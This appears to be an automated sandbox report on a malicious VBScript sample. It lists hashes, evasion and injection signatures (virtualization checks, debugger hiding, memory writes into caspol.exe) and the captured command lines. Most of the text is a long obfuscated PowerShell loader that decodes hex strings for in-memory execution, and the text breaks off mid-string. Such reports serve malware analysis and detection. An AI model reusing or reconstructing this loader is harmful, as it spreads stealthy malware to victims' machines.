a615a0e25040ca39c49560c9594c69f4ff6754faf0304c6e89c923cb340c9319

General

Target

Detallemovimiento.vbs
Size

439KB
MD5

1d50e209ab21cd2035f0727bdf51c6bb
SHA1

a9f206e9940d6f6b5abe7d608dfb15a20d5cf5f1
SHA256

a615a0e25040ca39c49560c9594c69f4ff6754faf0304c6e89c923cb340c9319
SHA512

4d20bfd9c71956ccc87af37de1468445d5b1b87bab1eea6b7b9d0d6298d1b879e962d2615ff4e58fdc7eacbf2badc5277bc87930baee0ac02885dbcea3bb8ff9
SSDEEP

6144:sDKtRixP0uu/1PM4Ramn3DBqVei8zWH30BiZSgP4K9LuTrEo7K08HIyGshUhBQxu:MK7iZ8PM4qVeHz0kBip4tQghmxxTs

Score

7^/10

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

876 powershell.exe
1384 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 876 set thread context of 1384 876 powershell.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1940 powershell.exe
972 powershell.exe
876 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

876 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1940 powershell.exe
Token: SeDebugPrivilege 972 powershell.exe
Token: SeDebugPrivilege 876 powershell.exe

pid	process
876	powershell.exe
1384	caspol.exe

description	pid	process	target process
PID 876 set thread context of 1384	876	powershell.exe	caspol.exe

pid	process
1940	powershell.exe
972	powershell.exe
876	powershell.exe

pid	process
876	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1208 wrote to memory of 1940	1208	WScript.exe	powershell.exe
PID 1208 wrote to memory of 1940	1208	WScript.exe	powershell.exe
PID 1208 wrote to memory of 1940	1208	WScript.exe	powershell.exe
PID 1940 wrote to memory of 972	1940	powershell.exe	powershell.exe
PID 1940 wrote to memory of 972	1940	powershell.exe	powershell.exe
PID 1940 wrote to memory of 972	1940	powershell.exe	powershell.exe
PID 1940 wrote to memory of 972	1940	powershell.exe	powershell.exe
PID 972 wrote to memory of 876	972	powershell.exe	powershell.exe
PID 972 wrote to memory of 876	972	powershell.exe	powershell.exe
PID 972 wrote to memory of 876	972	powershell.exe	powershell.exe
PID 972 wrote to memory of 876	972	powershell.exe	powershell.exe
PID 876 wrote to memory of 1384	876	powershell.exe	caspol.exe
PID 876 wrote to memory of 1384	876	powershell.exe	caspol.exe
PID 876 wrote to memory of 1384	876	powershell.exe	caspol.exe
PID 876 wrote to memory of 1384	876	powershell.exe	caspol.exe
PID 876 wrote to memory of 1384	876	powershell.exe	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Detallemovimiento.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pigs = """NoFKouBynOpcUntOciAmoHynMo SkHAnTCeBUn Po{Pr Ob Fa Wh RepapaDdrUnaBumIn(Sy[MaSbltSprSeiMinChgPa]Sa`$GlHJaSSi)Sp;Ci Na He Ta ga`$PeBUnypetBoeHosDi Sy=Ot PrNEleRawFa-NyOOubByjSueRecPatAf KobStyPitMyeRe[St]Ma He(Sk`$PtHBoSIn.SkLUneVsnAfgMatAmhTe Mo/Da Sp2Bi)De;My Tr ov Sc RaFSaofarFa(Pe`$noiUn=Ar0Ov;Ec Bo`$VeiRe sp-YnlAmtOm Fe`$ImHBlSFa.NoLKoeOdnFjgTytMahSu;In Fo`$FuiUg+Af=Gl2Te)An{ha mo Vo Ge Sh Dd Ph St Di`$StBToyUntUneDisDy[Su`$ChiMi/Tr2Go]Me Fa=Ta Hy[CacInoVenSuvPaeCorCetTe]Hy:ot:xeTunoTaBmiyFotPieHa(Fu`$AlHstShi.MeSReuStbSksMatOtrFoiGanopgNo(Al`$coiFa,Ph In2Ad)El,Pr Pr1Te6Fy)Ko;Ar su De`$AnBUuyTrtTeeMesBr[Ti`$IniUn/Ba2An]Bo Po=Ef De(Bu`$InBNiyGrtStestsEn[Al`$PhiDa/De2Ex]Sa st-UdbDrxSpoRirKn Ov1Ha6Fo0Fi)Te;Af Lo Br Sl Un}Un Ki[FrSBltFrrNeiDinSkgGe]La[UnSStyUnsPotFoeZumBl.SuTDyeCoxDrtFl.UnEubnKucBroNodMaiFrnnegra]ti:En:MiABuSSlCflIvaIKr.SlGJueMitfoSTatOxrAfiPrnPhgDi(Re`$RgbNiyintUneOpsGu)Mi;Sk}Bu`$SeYLunSqdDiiFigBehUneArdLaePlnejsFa0Hy=KoHGeTWeBBj Be'ThFLa3unDBl9BeDDo3MsDSu4DiCAu5TeCJaDNo8AuEUdCSv4ReCIsCAmCSkCDi'Su;Ha`$ScYTpnEpdIniFugMihtoeFodNoeBlnsksWe1Bu=ExHDeTgyBhj Tr'HyEFrDfuCEk9PrCWa3KeDCa2PaCMeFTsDOm3LaCInFPaCbe6OpDmu4Xe8InESoFKa7UdCHa9SoCgaERe9ab3Vi9Em2Ch8PoEImFBr5SoCBrECoDVo3HoCGl1arCEt6BlCcr5TyEUnESpCNo1unDSt4ReCSk9DrDug6TaCMi5PaEDiDCoCKl5PlDEc4StCKu8StCFoFGuCTy4AuDPs3Li'Sa;Gi`$VoYcanurdthiSogSohEveAfdSuetenArsDa2Ku=RiHUnTEfBOl Lr'GrECh7LeCUn5SiDAa4AlFSo0ShDKo2IsCLaFTaCfo3AfESp1foCSt4PrCTe4SuDRe2TrCVe5BeDAq3AnDCo3sq'Br;Ps`$TrYDynCodPyiHogSmhSteNedFreArnDesDa3Bl=MeHSaTovBUn Sa'beFGu3FlDBu9BaDKv3TrDTa4SlCDe5TyCBeDTi8MaEuuFBa2BrDCa5PrCStEObDRe4NiCSl9AmCSiDMuCst5Sl8FeEPoEPr9OvCOlEAaDFo4AuCDi5KiDEl2BaCOvFBrDFi0FaFje3HeCSp5FrDNo2SkDLy6CoCRa9JeCFa3HeCli5OpDWh3St8MoEstEAt8HaCEn1PrCSiEByCFo4ClCBeCfoCRe5PhFSe2WoCTa5AfCHy6Mu'hj;Ch`$peYacnSpdEpiElgTahStePodVeeLanWosFg4Kr=LaHErTOcBUd In'IaDYv3ReDAn4CyDXy2DeCIn9TaCTrEInCSm7Re'Un;sm`$BuYKvnTrdViiUngFohMaeDedPreStnAasUd5Af=LiHLoTGuBCy Fo'InESa7ToCve5AoDJa4PiEatDThCLoFsvCfr4PoDBo5TiCAfCGuCKr5TrEGa8TrCBi1DuCDuERiCsp4AmCRiCFaCDe5Hy'ap;Te`$PoYFonIndIniDjgFrhMeeGedSteSenfasFo6St=SuHUdTflBFa Al'juFUn2ArFFo4PoFUd3WhDWa0SpCDa5UnCko3BeCDe9SaCLi1PaCPrCNeEmoEBiCof1SaCtrDSnCTi5fe8DeCHa8Im0UnEBa8SeCUd9ZiCEl4AkCSp5AmENo2NoDHy9PhFKl3NoCUd9HiCev7Ri8EnCDo8Ha0UnFJo0ShDva5TaCEs2PoCplCViCLa9OrCFa3Ud'wi;Ha`$DaYRanGodFriMagNuhFreRedOneGrnTasfr7Kr=GaHInTArBCo Pa'SpFsv2coDLe5PaCfoENeDMo4UnCDu9HaCDeDRuCAn5Co8BiCAl8Ti0ruEBaDPrCcr1FeCYnELoCPo1onCSp7VeCPl5NoCBr4Do'mo;Be`$ReYDinFidAniMugSehwheSudSpeSinKisBr8Sa=HaHUnTByBAf Ki'UdFIn2GaCCh5RoCIn6UnCVaCOpCTr5LiCDe3BrDSt4JaCps5keCHa4StESv4NyCHv5MeCTuCJaCAu5CoCJi7MiCBy1PiDSk4UnCMo5Bo'Fr;He`$AnYGlnBodBoiYrgelhMieIndApeHonPasFe9cr=BaHLyTErBSe Ex'PrELo9FuCImETrEWaDBiCTy5OmCTiDSkCJoFSmDfy2SeDEs9PrESlDStCTsFGaCSy4BeDDo5TiCSpCMeCIn5Es'Te;As`$KnNStbUnefldFieelsMe0Fl=ReHStTafBDo Jo'MiEAvDMeDGa9VeESu4DiCOv5HaCShCSeCpa5anCBe7MaCMa1UdDKl4HeCSh5EnFAl4WiDCo9BrDSt0FeCHy5Sk'ho;Om`$BgNHybSuePrdFyeOfsFe1Ud=BoHHaTHeBFu Un'NeEFi3FrCSaCbrCPe1SaDAf3FiDMa3Ye8ImCSe8Mi0skFIn0frDLn5SkCGa2EnCMeCReCch9AdCWe3Fe8HaCra8Up0SuFPu3foCAf5KrCOp1FeCBrCTaCRa5SnCel4Bi8ShCCh8Mi0TrEAl1UnCSuEGeDre3AnCEn9JuECv3MiCsoCUnCPe1AsDop3RaDRe3Kl8SeCKl8Se0NoEAn1BeDAn5SaDOf4AcCFaFUrEDr3UnCCoCDeCPl1suDDa3FlDRe3St'Fr;In`$DaNDibBreGedIneCasRa2Dy=fjHleThoBAr di'DiEIc9grCStESmDHu6ReCBeFBeCadBunCOv5Am'Se;Un`$BiNMibDaeEkdRoeEjsFl3Pr=SpHKoTReBWi be'RoFBe0JuDTe5FaCAc2MoCNoCMuCTi9BeCSm3Sy8syCMo8Ue0HoEOu8FaCov9TrCSr4VaCbi5BaEdo2OpDAu9WaFUk3CoCsp9prCva7Pu8CoCCo8Po0buEPrEViCDo5doDMo7OpFRe3ToCStCdeChwFCrDGr4Mo8suCAl8Hi0PrFSr6StCDy9baDJi2EfDFi4DiDTa5DaCKy1MiCMiCDe'Sq;Pl`$GgNCybNoealdLoeAgsPe4Re=HeHLaTPeBLi Sm'UnFpr6exCLe9WoDBo2ScDbi4LeDSk5AnCPe1HeCWaCDiEGa1BeCTpCFlCUnCunCHiFCyCBr3Pr'Ju;Br`$AcNDibaneOpdSaeDesSe5ia=paHPhTKlBBa Sp'OuCKaESiDGo4AbCNo4DoCDgCChCClCEr'Af;Be`$SkNTrbBueStdAfeMisAs6Af=PoHHjTCrBTr ge'SqEUsEOpDZu4CoFPa0JaDtr2TrCInFPrDBe4PaCAs5FuCSp3CaDUn4CoFTi6HaCDi9MaDHa2EuDSl4UnDGr5StCIn1ReCFiCUlEUfDPrCMi5TyCInDErCheFKoDSi2huDla9Pa'Li;Op`$IdNtabSkeIrdEneRysTi7De=CrHReTUnBHe Pe'DiEAf9GlEPe5FoFKa8Do'In;Pa`$JuNGlbPaePrdNoeGasTe8Ba=KoHScTUnBMi Al'stFSiCPs'Ou;udSVieSotLa-KoAKulRuiSpaUdsSa Re-RinLeaBamQueRe UdNNobEleRidBleRisAr9Pl Pr-FivPoaFolStuCyeGr di`$TiNMibPseUndLneMosEc7As;InfLiuSknUscRetWoiSkoSknIn lyfOrkTtpun Ra{MiPMaaAnrhyaGrmAk Rk(Pa`$OovUd_temDo,Ca Hj`$DavDr_KipDe)Fa Cy Om pl Gr Sc;Ic`$ApUSanSkcSkoJimSimUdoFlnFrnIneousIasSh0Me Fo=AzHTrTNoBSt Se'De8Fi4HiDAv6AnDSa5UnCMyEOvCRnDVo8Fe0Ho9CoDNe8Wh0Ch8Pl8ReFAfBKaEDi1ReDOd0InDKl0UnEWe4FlCYoFBeCUnDStCSy1SoCUd9LaCPrEVaFTeDGe9PhAPe9MeANeEPr3AfDDr5HuDLn2ElDVo2PeCSt5TrCAnEsoDir4SjESe4OrCPoFItCOsDafCXy1EmCAf9PeCLiEOv8ReEMeEch7EmCBo5foDNa4tiEin1sjDEg3KuDBa3BrCUd5CoCFlDHoCSo2alCArCHoCRe9SuCSw5SmDPr3Kl8Fo8Tr8Mo9So8Ru0FoDStCEk8Pr0RaFIz7EnCep8CoCMa5FjDFj2SeCSk5Zi8WaDLoESnFpaCHa2SaCtrAprCSu5OvCEm3BiDBy4Sk8Se0FoDDuBRe8Sk0Ov8Br4MaFHuFFr8HyEDiEAc7NoCLaCDaCVeFcoCUd2InCLi1UnCApCBaEKn1TuDun3HaDFo3PhCpr5foCAlDTiCSe2ExCBeCBrDHy9EnETu3SiCTr1KoCPe3WeCAn8InCRe5Yo8Re0Sa8UmDDiElu1leCTaEkaCGo4Lg8Tr0Re8Mo4KtFKoFCa8FrEAcEWoCUnCReFJeCEx3UdCPt1KoDAt4FrCHa9TiCPrFveCDoEWh8SkEBrFDi3ElDTe0NoCSnCWrCRh9PoDCu4am8Ph8Di8Pa4ApELiEFoCPe2KaCUg5SkCBe4NoCFo5ToDTr3Ma9Lu8Af8Tw9ThFGlBFo8SoDXy9ju1InFBeDtr8UnEStEUn5unDBe1HaDTa5geCAb1FuCunCspDPr3Li8Tr8Ti8Nu4PoFMy9MyCPjEUnCRi4ReCHa9CiCHa7PaCPr8PoCMy5OvCFu4UnCEn5TeCInESaDRe3Ka9Ho0Bo8Sn9Ba8Ba0LiDNoDBo8Ta9St8TeEJyEHa7FlCSt5haDAg4FeFMi4CrDVa9DrDso0TeCAl5Na8Pr8bj8Ca4SyFSw9SaCDeEDeCFo4CaCMe9KaCCy7reCin8SwCth5InCMa4ToCBu5CyCTaEEnDBo3fl9Am1Rd8Tr9De'Vg;PeNPrbPreOvdkoeMosUd9Nu De`$LeUOpnRecCoogemRemReoBlnGenBreResassHj0es;Hj`$HoURenSrcOroJimnomCooIanAnnSaeCisNosVa5Ho Ja=Kk CoHKnTFrBPu Un'Sk8In4ApDIn6ExCJa1DiDEn2QuFSyFRaCUd7RaDDe0ReCLa1Ba8ou0Fo9tvDRe8Ku0Br8in4SeDHo6UnDAr5SaCKaEPoCEnDSt8GeEFoEDr7PrCac5NaDEu4FoEWoDWeCRo5SpDTr4DoCPr8BlCbeFRaCTo4Ko8Fr8Re8Gi4CaFPh9SmCReEEfCAi4PaCEp9AnCSi7GlCPh8DiCad5HeCsl4VuCEt5stCBrEOcDBr3De9Lo2Sc8NuCmi8Ek0PlFStBPaFAr4TrDMo9SiDAr0EmCGe5ciFsuBFjFChDUlFCoDAf8we0BiEPi0un8Sk8Ma8ko4BoFSt9skCFoEScCAe4ShCMi9MeCRe7UtCOp8PrCPa5ReCre4OpCCa5PeCGlEPuDLa3Sa9Mu3Ee8CoCFo8Se0Th8Na4StFBi9RaCHaEGeCEt4KnCDa9DiCFi7TaCTo8OpCTa5BrCUn4LeCSp5MoCOvEUnDSa3li9Si4Pr8Us9Os8Up9Sw'Da;PrNClbDyeNedmeeMisGh9Su In`$seUUtnMicZeoTrmSqmKooPonexnRoetosAasAc5Me;Im`$SkULsnTacHgoHimBlmEmoPsnArnHyeLasDesBy1Ja Ap=om AeHskTUeBUn Kl'PhDUn2GrCsk5OrDKv4ReDpr5haDCr2AnCFiESu8Sv0Pa8Re4PrDIn6saCAl1UnDSt2BrFArFneCKo7SuDCa0TrCFr1Ni8TeERaEPa9CoCSkEHaDAl6AfCSpFFoCDeBPoCBn5Fe8Sp8Di8Fu4EbCcaECrDsc5ScCLeCInCHyCFo8EgCpr8Pi0BiEIn0Vi8Ju8DrFMaBSuFFi3RaDKv9TsDAr3GuDRi4LoCSc5PeCDoDSt8PiESuFSt2OvDta5AlCUnEAtDAr4GuCFo9ArCBaDThCfl5Co8SmEAmEMi9KeCAlEtiDSn4SkCTe5ReDSn2MeCThFmeDMi0LeFMu3TrCTa5StDDr2KoDSl6PeCTr9AdCsk3DaCPh5SeDAd3Pe8GrEAnEFu8CoCVd1ExCAlEAnCBu4SkCShCUnCOp5UlFLa2GaCFo5prCRa6SpFbeDAf8Pr8DiENoEBrCTn5HoDDi7De8coDPyEUnFloCOm2CaCVeAUsCFi5FoCoe3SiDSn4Sk8Be0BaFPr3GrDPa9ReDTv3AuDDu4BrCBe5KiCFoDDu8HaECrFhu2ToDSl5ReCloEThDSe4SkCFl9SkCAkDStCEs5Ke8PoEBrEFu9CuCAmECrDGa4DeCVi5GaDMe2PrCCoFSkDLn0flFKe3BiCBe5SoDPl2LuDLa6MaCKl9TrCAv3UdCDl5FoDBi3su8atEEsEVi8HoCTa1FoCOnEFoCSk4FlCSeCSaCPr5VaFRa2PaCPr5CoCKr6Ro8va8Ca8Ve8FjEYvEDrCPo5SpDSt7Tu8skDGuETaFAnCAr2ReCRoAFyCGo5UrCFe3MaDLo4Ra8Om0PaEPi9UnCOpEOvDSu4DoFSl0FoDDo4UnDUn2Bu8Sk9Li8beCHe8Di0Ja8De8Ko8Ga4RaDSi6ElDMa5SuCPoEGrCKrDoc8JaEjyEmi7blCAt5GrDRe4CrELeDApCmo5VaDNo4PsCSy8SpCReFFeCSa4go8Ar8Ju8De4cuFLi9DyCBiEBeCSn4HaCTi9InCPa7MaCSr8fiCum5MiCTr4UdCMe5GoCBrEGeDfe3Ae9Ak5Sk8Gr9Du8Pr9Ci8tuECoEta9jyCPoEslDSu6meCTaFAaCReBUnCFr5Ju8to8ou8Vo4DrCNoEStDPl5EkCReCAfCBeCBj8TaCfo8Ge0TeEBr0Mu8Sq8Bo8Bu4FoDDi6NoFPrFRuCKrDLa8Ca9Fe8Gu9Un8Re9Ac8Gr9Co8DiCRe8Ce0Gl8Fo4CrDHy6KoFReFRaDSa0Av8St9Di8Li9Bl'Re;ChNLabEleStdEfeEnsFr9Mg Di`$afUSpnJucAfoAemKamProSknGanReeBlsmisMu1to;Ci}BefFuuPonGacIntSiiGaoPrnTh TiGDiDSlTSi Or{svPDoaBrrPeaFomBr Ig(Ce[FuPAlaVurSlaEkmIdesptPaeJorMe(OpPstoStsIniRetReiAgoOfnVa Kn=Ne Om0Fy,Gi DiMHuaTjnKldCaaUntTioPsrMoySk Ud=ne Sp`$OmTSyrSouSteSt)Fo]Tr Ad[fuTKayLopVaeBe[Mo]Li]Fi Ol`$HovPoaSarAf_frptoaskrKoaEtmKaeFrtSkeForUnsse,St[ByPSwaChrOuaSymBeeAntFreGorCa(EnPoloPespoiChtUniShoEmnPa Re=Hy As1An)Di]Cl Hr[GlTTiyAlpLiePi]Sk Ho`$AfvTirPrtPo Ja=At Ac[EnVPaoDeiBadPo]Fr)Di;Br`$BeUArnTrcHioTamInmZooJunAfnOmeLesHysAt2Kn Er=Da DiHLaTViBDi de'Un8Se4PsFPr6PaFUn4SoETr2Gi8Ru0Fe9UnDSo8Po0ReFnoBasEDe1YdDfr0BrDBe0AvEAd4SpCSeFBoCKaDKlCTo1KoCov9poCTaEReFEmDSa9VaABr9JuAgeEHa3ScDLi5LiDTe2snDun2NeCMa5dyCReELuDFl4AtESk4KrCVeFByCVsDFrCSo1coCDo9BoCUnEap8UnEBrEKo4RaCSt5NoCKo6KoCCh9HyCvaELaCPh5MoEMe4NyDOs9FuCSpESlCPh1FaCViDExCka9TrCMe3SkEco1FoDVa3PaDMe3CaCKl5ReCAnDSlCAr2SiCBaCOvDTe9Ca8Ox8Vi8St8NaEEnECiCAd5UnDFi7Pr8ruDCoEKuFKrCTi2AiCseAJoCCo5MaCDi3AmDMa4Ar8Sa0UdFEf3SuDMi9SeDTr3ApDPa4OxCRe5EkCNeDOv8CiEKaFSu2EkCIr5JiCge6geCFiCTrCGh5GoCOb3AlDUn4UnCSn9SaCStFAnCFlETa8BeEFeEjo1BrDRe3RoDko3StCSe5FlCHoDSuCAc2ElCZeCCoDka9boEPuEPoCCo1BlCakDSrCte5ch8Za8da8Tr4CiFMo9FiCTrEGeCPh4PrCHe9ReCZo7AaCSk8BaCRu5UiCAj4BiCPr5SiCToELaDSo3Sn9Ta8Bu8Un9Ro8pa9Dy8InCja8Me0UnFAnBBoFHu3ScDHe9InDPe3tiDAc4EnCKo5tiCUdDto8EqENoFGy2thCAf5OpCin6UnCCoCReCPl5BrCKa3PoDSu4MiCSh9stCBaFEmCAaECa8ldEChENv5UnCSpDhnCSt9DeDIn4An8AuEPrEAk1PiDUd3MyDEv3RiCNa5SpCBaDKnCSa2DiCsuCOcDWe9EfETr2ExDVa5GrCHm9BaCGlCGaCKe4UdCSp5HaDMa2UnEUn1LbCAt3DeCDi3TiCst5BrDUd3ViDfr3heFanDSu9PrAHa9ErAbuFHr2SkDUd5moCLoEFl8Ti9Ny8HaEAnEId4ReCTa5anCTa6FjCEf9JrCVaESoCTv5LuEpo4AgDDa9HuCPrEKnCOp1SpCStDGoCac9prCAp3AnEDiDSlCNaFFoCSk4LaDSp5EpCReCFoCPa5My8Af8Pa8Mo4TeFHa9TaCOkETeCpr4HrCPa9PlCLu7ViCHe8PaCAs5GlCAu4poCGe5ViCBoEArDWi3Lb9Tu9Co8DiCLe8Ga0Pr8Gi4SeCab6HaCUn1VoCStCFeDSp3koCTy5Se8Tr9Su8brECtEWh4ShCTa5UnCAt6ErCGa9giCSuEUnCPl5CoFka4HeDSt9riDLk0TaCUn5Ha8Ki8Un8Af4FaEKoEraCSr2toCKo5NeCke4HeCFe5ShDMo3Pr9An0Al8TiCZo8Gr0Dr8be4PaELiEUlCRe2LyCSu5EtCHj4saCKu5SeDIo3Im9Sk1Ea8HaCkl8Ar0TrFMeBCiFmi3DoDDi9udDHo3prDLy4MeCsa5udCmoDIn8UtESmEanDFrDCo5AmCStCKoDBl4chCla9PaCVa3CoCau1UhDRa3AsDFr4IoEUl4moCLe5PaCPiCChCBe5ThCIn7LiCSk1FiDCh4CoCJo5CrFNuDPa8El9En'Ko;MaNFrbTheSpdReeFosSo9Am Se`$edUUdnEncOnoComKnmSyoStnMtnUreGrsPasPr2Kn;Un`$GlUVenHocCooRemMimPjoAcnConAleAmspesTr3So Kr=Hj DaHscTvaBSi sk'Ek8Un4StFFl6CoFSa4DiESl2Ni8LiEDiEFo4AnCSo5guCOr6JuCAn9GrCBoEHaCWi5GaEEr3MuCPnFneCSaESeDWa3ChDMu4BrDPo2PrDPs5HkCpu3TrDHy4SuCLaFSkDRe2De8El8mu8Ch4MeFAt9AlCChEBlCCu4UdCRe9BiCku7LaCMy8TeCKa5NoCKa4AfCBa5boCZoEJvDHa3Fi9Ro6Un8MyCFl8Li0DiFBiBReFCh3SkDOv9InDKu3prDVo4fuCOp5PaCCiDKa8AcEPaFAb2udCPa5UkCUd6ReCUnCPoCCh5PuCPr3PeDAr4ReCDi9PrCHeFNoCPhEPa8TrECeEFo3KlCAb1BeCGiCGlCPhCBeCDi9HeCUdEInCOv7BlEsa3TrCRaFAfCroEDuDCa6OmCRt5BiCKaEBrDNo4UnCPr9LgCNoFTaCBeEFnDAl3InFBeDOp9MoATr9InAThFFa3HeDUn4BoCSk1inCKiEScCfo4LaCFo1PrDVe2BlCNo4De8SiCKa8Af0fi8Fo4PaDAu6BkCEn1StDMi2SuFTeFCoDSu0DaCVi1UnDFr2spCCa1OvCUdDVoCCa5ChDSt4OvCLd5StDKe2SuDHy3Ri8Mo9Lo8NdEBiFLe3AuCGr5ApDCo4StEGr9TiCPnDSuDFi0ChCPoCTaCGr5StCToDEvCHa5OpCPaEWiDDu4TyCSp1PaDOr4EuCCu9WiClaFOtCPrEGrERe6SeCPrCkiCSt1GrCTi7UnDVa3In8Go8co8Ch4SpFGr9DrCCeESkCPy4DeCRa9RoCah7ChCre8OpCMa5GrCUn4SeCen5SuCHoEAcDSt3Ri9Te7Vi8La9Ju'Ca;ilNOvbIneKudRieAlsIn9Co Cy`$boUGlnPrcUdoMamStmtioMynganBaeAnsWasDe3Fo;So`$LaUKunOocAcoOvmInmCeoRenZinGieSpsSisUn4Vo Fr=Pa FaHPrTMiBPe Ko'Ci8Sc4PrFDe6TrFAn4DiEBe2Ca8SpESpEFl4ScCNo5BuCKk6BiCha9MiCFeEJaCIs5FiEReDSuCGa5FgDVe4BiCOu8OuCPaFDiCMo4Ti8al8Vo8Et4FiEArEhaCDe2TaCob5TiCSi4SvCOr5GrDBi3Ap9Ee2Sk8FiCKa8Gr0An8Sq4inEGeELyCCl2ReCVa5QuCGr4MoCVa5AtDCe3Fa9Re3Cl8UrCAf8Or0Sh8Ut4GlDTr6PaDTr2AnDDy4Mo8LaCBo8Ba0Ad8Sv4UnDta6HaCDe1prDDe2TaFInFUdDSk0CoCEm1KoDNo2BrCEj1YaCMaDTaCBa5scDTe4FaCUn5NaDUn2AuDEp3Te8Hy9Fr8AgEMeFKo3AaCMe5DoDDe4FoEdo9CoCChDReDRh0TaCpiCErCMo5GrCTrDAnCNg5ObCStEPiDRe4BeCTe1PhDMi4SpCUn9GaCSaFIlCOuEAfETi6PrCBeCAlCEx1PeCMe7boDAt3th8Ox8Su8Eu4StFKd9ElCKiESuCCl4ScCKr9BaCsj7PoCSl8BeCFi5BiCVe4UdCGv5MiCSaEsaDPa3bl9ci7Pe8Ce9At'Se;apNPrbTaeHadUneFlsaz9Ch Va`$VaUPunIgcKooRemSpmVioStnTrnFleFusunsou4Me;Hy`$LuURenCacPooAsmArmInoLenLonDeeOpsPesFi5ad Un=Am LaHUoTRaBTr Sa'LaDNo2DkCBu5VaDCr4SkDDr5soDTo2CrCBoEEs8Pl0St8St4AnFOl6HuFva4TrEAl2St8saESoEDo3DoDWi2ReCSa5FuCRe1AfDRo4LeCEn5MiFKi4StDUd9BrDSk0ThCBl5Te8Ns8me8Si9Ye'Fr;SnNBrbUneMadPaeSusTa9He Bi`$UnUBenNocCooTrmChmHooFonZonNoeRasBlsSk5Tr Op Su Bi;Sy}Ry`$spkmekSk Re=Br MuHpaTAfBEp te'CuCClBKvCCo5HiDDr2GaCdeETyCAm5FlCIlCpo9An3Ge9Gr2Fa'te;Vi`$PrUGgnVucknoEjmUtmCoodrnStnBleApsYesFr6Kv He=Is MiHCaTDeBLa He'ma8Hu4KrDPr6PaCun1FiDAf2NaFClFsnDIn6SaCSi1Ta8Re0Or9NeDBu8Pu0AlFLuBSaFOp3AtDKo9VaDNo3UdDBa4ReCSo5CoCChDVi8AnESmFSp2SoDIs5KyCRaEFlDFl4PrCCh9taCGaDskCCo5Cr8TaESeEhe9CaCAmEmaDMo4ReCdi5MoDTo2SuCUnFPrDIl0IlFAc3TaCWo5BrDGr2MyDSu6ApCFu9InCCo3HyCAs5BlDUd3Se8CaETiEseDOmCSh1SuDPa2VeDSo3OrCAr8OpCTr1FoCKuCChFNoDSw9TyAGe9NiAHuELa7DiCTu5MaDBl4TuEUn4HeCCy5FaCByCAnCSc5HeCPo7NoCEr1MiDVi4FoCSi5SeEVe6NoCNoFNaDCh2SpETh6RaDAu5liCZoEHaCOr3PaDMy4MrCBu9SaCUnFStCFrEAnFaa0GeClaFdeCZo9spCRoEUbDAf4ZeCTa5DeDEv2ro8Su8ch8Bo8BaCSu6FuCPsBUnDkl0Ou8Mo0Ba8la4NoCIdBCaCFjBOp8Nu0Az8Ud4DeEJoEReCMe2BlCPo5frCDa4BuCSu5PrDSy3Ev9Fl4Ti8In9Pu8ImCRa8At0Ko8Sa8RuEPe7TvEIn4abFSp4Da8Ta0HaEho0St8Gl8GoFHaBCoEMo9KeCisESeDCh4KoFOr0MiDCo4UdDPr2KoFkrDRe8UnCRa8Cc0NaFNaBNuFAm5CoESk9UdCSuELoDga4Va9Re3Cy9Ba2LoFBeDTr8ReCEr8Fu0GeFgeBAnFSo5SeEFo9ToCguEAtDZo4Sp9Un3Br9So2ReFdiDCo8GuCLn8De0BeFSkBSyFMa5UnEUn9PuCTiEMyDRe4Pe9Ho3Pa9Di2CeFPrDRe8Fl9ps8Se0Di8To8SwFNoBSaETa9NoCMaEBuDFr4SlFMe0QuDAc4SaDBa2HeFLdDKi8An9Bu8Un9Me8Sp9Da'Ke;TyNLabBaesidSoeCasRt9Un Sv`$KeUBlnSkcBeofemSamTooBlnFanBreResResTr6Af;Be`$AxvBaacorVa_FonGatEv In=Ra VefTakKopVe Sp`$foNnobDyeTudTueLesCu5In Or`$UnNBlbPleEmdSkePrsPa6Re;Sm`$MaUConOccCroFamPrmGioPhnHynBlePrsAlsFr7ut Sm=Ve VeHUpTpaBDe Vi'Su8By4TiFSe3HuDpo4RiCFl1udDMd4MuCUnFPoCSn9GrCIlCCh9Po3Ma8Ed0Re9EsDTi8mi0fo8Co4BiDAn6DoCAa1AbDPe2BrFArFTrDFi6FgCIr1Fl8TaEUnEin9TaCLeETrDBr6EcCPoFUlCTaBGoCSn5Or8Ve8SeFFiBBiEDe9MuCfoEBeDNe4JoFAr0PrDSu4KaDNo2BrFSoDUd9TrAFo9PlANoFSpAsaCLa5AlDIn2FeCDeFHi8FuCGu8Un0Su9De3He9Sk6Tr9Fo2fo8PrCMu8We0Ku9Aa0InDPa8Un9un3Gr9Co0Br9Ge0Fo9Ra0sa8PaCSp8Op0Ru9To0PeDTh8Br9Fo4Sm9an0Br8Di9Av'fl;InNEqbsieBudcaeSosCa9Un Bu`$TyUBengicSeoVumOkmCyoUnnFrnSkeSesVasSi7mo;Pa`$ImUTynPucReoBrmBemUdodenStnCreKgsmisCl8Co La=Te CrHDeTStBNi 